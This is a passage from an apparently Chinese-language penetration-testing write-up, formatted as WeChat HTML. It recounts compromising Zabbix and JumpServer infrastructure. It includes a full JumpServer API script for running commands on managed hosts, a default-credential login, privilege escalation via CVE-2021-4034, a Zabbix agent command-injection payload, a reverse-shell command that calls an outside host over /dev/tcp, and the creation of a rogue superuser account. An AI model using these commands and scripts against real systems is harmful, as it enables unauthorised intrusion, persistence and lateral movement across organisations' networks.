500;">访问log_url，获取命令执行的结果。</section></li></ol><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_task_log</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/ops/celery/task/e70ce2ab-1831-46d0-a4d1-ecc968dce298/log/&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    response = requests.get(url, auth=auth, headers=headers)<br/>    print(response.text)<br/></code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.12782874617737003" data-s="300,640" style="" data-type="png" data-w="3270" src="https://wechat2rss.xlab.app/img-proxy/?k=77259c2a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIH0QT55zZ67cPG4Thhd86XibY300y8Sq8qu2O9TLv2Kkwjk8IoItu75g%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">完整的利用脚本如下：<br/></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"><span style="color: #5c6370;font-style: italic;line-height: 26px;"># Python 示例</span><br/><span style="color: #5c6370;font-style: italic;line-height: 26px;"># pip install requests drf-httpsig</span><br/><span style="color: #c678dd;line-height: 26px;">import</span> requests, datetime, json<br/><span style="color: #c678dd;line-height: 26px;">from</span> httpsig.requests_auth <span style="color: #c678dd;line-height: 26px;">import</span> HTTPSignatureAuth<br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_auth</span><span style="line-height: 26px;">(KeyID, SecretID)</span>:</span><br/>    signature_headers = [<span style="color: #98c379;line-height: 26px;">&#39;(request-target)&#39;</span>, <span style="color: #98c379;line-height: 26px;">&#39;accept&#39;</span>, <span style="color: #98c379;line-height: 26px;">&#39;date&#39;</span>]<br/>    auth = HTTPSignatureAuth(key_id=KeyID, secret=SecretID, algorithm=<span style="color: #98c379;line-height: 26px;">&#39;hmac-sha256&#39;</span>, headers=signature_headers)<br/>    <span style="color: #c678dd;line-height: 26px;">return</span> auth<br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_user_info</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/users/users/&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    response = requests.get(url, auth=auth, headers=headers)<br/>    print(response.text)<br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">post_ops_command_executions</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/ops/command-executions/&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    data = {<span style="color: #98c379;line-height: 26px;">&#34;hosts&#34;</span>:[<span style="color: #98c379;line-height: 26px;">&#34;fdfafb91-7b0a-425a-b250-56599bfc761b&#34;</span>],<span style="color: #98c379;line-height: 26px;">&#34;run_as&#34;</span>:<span style="color: #98c379;line-height: 26px;">&#34;973320fd-6f06-4f59-8758-8ee52b6f7283&#34;</span>,<span style="color: #98c379;line-height: 26px;">&#34;command&#34;</span>:<span style="color: #98c379;line-height: 26px;">&#34;whoami&#34;</span>}<br/>    response = requests.post(url, auth=auth, headers=headers, data=data)<br/>    print(response.text)<br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_task_log</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/ops/celery/task/e70ce2ab-1831-46d0-a4d1-ecc968dce298/log/&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    response = requests.get(url, auth=auth, headers=headers)<br/>    print(response.text)<br/><span style="line-height: 26px;"><span style="color: #c678dd;line-height: 26px;">def</span> <span style="color: #61aeee;line-height: 26px;">get_assets_assets</span><span style="line-height: 26px;">(jms_url, auth)</span>:</span><br/>    url = jms_url + <span style="color: #98c379;line-height: 26px;">&#39;/api/v1/assets/assets/?offset=0&amp;limit=15&amp;display=1&amp;draw=1&#39;</span><br/>    gmt_form = <span style="color: #98c379;line-height: 26px;">&#39;%a, %d %b %Y %H:%M:%S GMT&#39;</span><br/>    headers = {<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Accept&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;application/json&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;X-JMS-ORG&#39;</span>: <span style="color: #98c379;line-height: 26px;">&#39;00000000-0000-0000-0000-000000000002&#39;</span>,<br/>        <span style="color: #98c379;line-height: 26px;">&#39;Date&#39;</span>: datetime.datetime.utcnow().strftime(gmt_form)<br/>    }<br/>    response = requests.get(url, auth=auth, headers=headers)<br/>    print(response.text)<br/><span style="color: #c678dd;line-height: 26px;">if</span> __name__ == <span style="color: #98c379;line-height: 26px;">&#39;__main__&#39;</span>:<br/>    jms_url = <span style="color: #98c379;line-height: 26px;">&#39;<a href="http://192.168.21.166" target="_blank">http://192.168.21.166</a>&#39;</span><br/>    KeyID = <span style="color: #98c379;line-height: 26px;">&#39;75ed41cf-c41d-4117-a892-da9c76698d26&#39;</span><br/>    SecretID = <span style="color: #98c379;line-height: 26px;">&#39;ce3cdec3-df9e-439a-8824-2cefe15ec95f&#39;</span><br/>    auth = get_auth(KeyID, SecretID)<br/>    get_task_log(jms_url, auth)<br/>    <span style="color: #5c6370;font-style: italic;line-height: 26px;"># get_assets_assets(jms_url, auth)</span><br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">脚本可以批量执行命令，jumpserver自身也在被管理清单中，至此成功拿下jumpserver堡垒机。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Roc木木日站唯细不破，名言众多，今日分享比较应景的一则：</p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.27616747181964574" data-s="300,640" style="" data-type="png" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6c5dffe4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIcVblsVHQQNtRiaWfttWUHbeasSnTiaEkdupjkReoZXaKrhLXIf4aXSTQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"></figcaption></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>kangkangの攻击记录</h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x01 获取Zabbix后台权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一次项目，对部分 ip 进行了全端口扫描，发现一个非常见端口的 apache 页面。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5805892547660312" data-s="300,640" style="" data-type="png" data-w="1154" src="https://wechat2rss.xlab.app/img-proxy/?k=371395aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIwMQg4iaCicA9j1C2UJYQKiab2GyzXlTlAic3Fr0bpIQ7trEJ4icMY9BzrOg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目录扫描探测到了zabbix目录，找到管理后台。<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4911242603550296" data-s="300,640" style="" data-type="png" data-w="1690" src="https://wechat2rss.xlab.app/img-proxy/?k=3f4b79b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIVLLDldX5nuibr59fOGOlUMibzyU0vQWXdOQSuZfLeUhDEicUKaTpaRWKw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">默认密码 admin:zabbix，成功登陆。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4887005649717514" data-s="300,640" style="" data-type="png" data-w="1416" src="https://wechat2rss.xlab.app/img-proxy/?k=12dc7a76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIctnfzLXVxhxyicz3oj1VErbOZXP8jezkwTT3pxUrfic5l0BOGudyKuXg%2F640%3Fwx_fmt%3Dpng"/><br/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x02 获取zabbix服务器权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在 Zabbix Web 上添加脚本，“执行在”选项可根据需求选择，“执行在 Zabbix 服务器” 不需要 开启 EnableRemoteCommands 参数，所以一般控制 Zabbix Web 后可通过该方式在 Zabbix Server 上执行命令拿到服务器权限。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5042735042735043" data-s="300,640" style="" data-type="png" data-w="1404" src="https://wechat2rss.xlab.app/img-proxy/?k=16d6c73f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIfP0rlZhJ8WicMXJQia9VblEkpeBXkdebYib7hehibkcnWywFhnZDgUFFsg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">创建完脚本后，找到 server 主机进行执行脚本。选择类型是“执行在 Zabbix 服务器”， 无论选择哪台主机执行脚本，最终都是执行在 Zabbix Server 上。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5706586826347305" data-s="300,640" style="" data-type="png" data-w="1670" src="https://wechat2rss.xlab.app/img-proxy/?k=5f618221&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIZvR9XR3ib8ZAYiaq46ibicI1JAeibjabicVjGKr2UEAGN2JRV988Cibic5rdQw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">执行命令后收到反弹回来的 shell，默认是 zabbix 权限，权限较低。正好可以借机会试一下最近star比较多的综合提权工具 <a href="https://github.com/liamg/traitor，并没有测试成功。" target="_blank">https://github.com/liamg/traitor，并没有测试成功。</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">单独试了一下 CVE-2021-4034 Linux Polkit 提权脚本，地址 <a href="https://github.com/berdav/CVE-2021-4034。在目标服务器上进行编译、执行，顺利提权。" target="_blank">https://github.com/berdav/CVE-2021-4034。在目标服务器上进行编译、执行，顺利提权。</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">提权完成后写了公钥，通过 ssh 登陆服务器。开始进行信息搜集，查 history、翻文件、看进程、看连接。没有发现太多有用信息，只找到了数据库配置文件，进程也大都是跟 agent 进行通信。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">接下来想扩大战果，还有两个方向：</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">1、内网横向扫描</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2、尝试在Agent上远程执行系统命令</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">目标当前属于 192.168 段，在history和last当中发现了 10 段地址，粗略检测192、172、10三个网段的存活之后没有新的发现，所以开始着手尝试攻击agent。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x03 获取Zabbix Agent 服务器权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">（1）直接执行命令控制agent</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">众所周知想在agent上远程执行系统命令需要在 zabbix_agentd.conf 配置文件中开启 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">EnableRemoteCommands</code> 参数 （默认关闭）。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">如果在 zabbix_agentd.conf 中开启了 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">EnableRemoteCommands=1</code> 参数，一样可以通过在 web 后台创建脚本的方法，选择在 agent 上执行。但是后台中所有的 agent 都没有开启这个参数。所以需要尝试别的办法。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">（2）任意文件读取</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过在fox文章中学到的， Zabbix 的原生监控项中，<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.contents</code> 命令可以读取指定文件，但无法读取超过64KB 的文件。且 agent 默认以 zabbix 权限运行，无法读取 history 等敏感文件。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是我们可以查看 agent 服务器配置，zabbix_get 可能不在环境变量中，可以通过 find命令进行寻找。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">zabbix_get -s 172.19.0.5 -p 10050 -k &#34;vfs.file.contents[/etc/zabbix/zabbix_agentd.conf]&#34;<br/></code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5343228200371057" data-s="300,640" style="" data-type="png" data-w="1078" src="https://wechat2rss.xlab.app/img-proxy/?k=259854d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIDClcpNbJVC5dgAicWe6jT2auUibQFYnIoeia4JwxyjZSoIGt03Yia6u9IA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过读取zabbix agent端的配置文件，可以看到 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">EnableRemoteCommands</code> 确实没有配置 ，但是可以看到配置中开启了fox文章中提到的另一个参数 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">UnsafeUserParameters=1</code>。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.558287795992714" data-s="300,640" style="" data-type="png" data-w="1098" src="https://wechat2rss.xlab.app/img-proxy/?k=9d598147&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIWIkc75DoloWwzfVjYibHIcrgB1bjSuFDKbAIzsHxuA4OG5cDA2wbadA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">当 Zabbiax Agent 的 zabbix_agentd.conf 配置文件开启 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">UnsafeUserParameters</code> 参数的情况下，传参值字符不受限制，只需要找到存在传参的自定义参数UserParameter，就能实现命令注入。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4130105900151286" data-s="300,640" style="" data-type="png" data-w="1322" src="https://wechat2rss.xlab.app/img-proxy/?k=8b47e24c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIPO6Ah8pIDzsovlFia1DVvsUWYLlRf1iabQOaFwL3ic8T44yQUbicLRwzwg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">起初对漏洞原理不理解，没有搞清楚这里命令注入的意思，后来问过fox才整明白此处命令注入所注入的就是用户自定义的命令。选择一个函数如 chk.ssl_access[1, &amp;&amp; id]，成功执行命令。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">zabbix_get -s 172.19.0.5 -p 10050 -k &#34;chk.ssl_access[1, &amp;&amp; id]&#34;<br/></code></pre><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.133492252681764" data-s="300,640" style="" data-type="png" data-w="1678" src="https://wechat2rss.xlab.app/img-proxy/?k=457e0c54&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CITj4G7zDPHd37icYwVU6EHJ0UFVwxiboFjuyHIPa1w0RKbOiazff342hHA%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x04 获取Jumpserver权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">为了确认该系统有哪些业务，选择了一台标签为 web 的机器，进行反弹 shell。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">zabbix_get -s 172.19.19.19 -p 10050 -k &#34;chk.ssl_access[1, &amp;&amp;bash -i &gt;&amp;/dev/tcp/1.1.1.1/443 0&gt;&amp;1]&#34;<br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">同样使用 CVE-2021-4034 进行提权，查看进程，是一个 java 起的网站， 然后用 nginx 做了访问控制。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.07980941036331149" data-s="300,640" style="" data-type="png" data-w="1679" src="https://wechat2rss.xlab.app/img-proxy/?k=16b05565&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CI9ZYeA4xAKsExouYRNUmHfgyicOhtPjbAOH0icWQJLRPaIR6PAkxoEIcw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">打web服务和数据库的过程此处略过。通过 last 命令查看服务器的登陆 ip，发现都是从一个 ip 进行登陆，扫了一下该 ip 的全端口，在一个比较偏的端口发现了jumpserver服务。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.474366893143916" data-s="300,640" style="" data-type="png" data-w="1619" src="https://wechat2rss.xlab.app/img-proxy/?k=7db1d56c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIgr9ibERefib2ZhABweHl0YUFuumCWlOudTdpVn4bG1ECUoBmP09GNaTw%2F640%3Fwx_fmt%3Dpng"/><br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">恰巧这台也在 zabbix agent 里，重复之前操作，拿下这台 jumpserver 服务器。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过自有脚本添加 jumpserver 超级管理员：</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">cd /opt/jumpserver/apps<br/>python manage.py createsuperuser --username=user --email=user@domain.com <br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">成功进入</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" 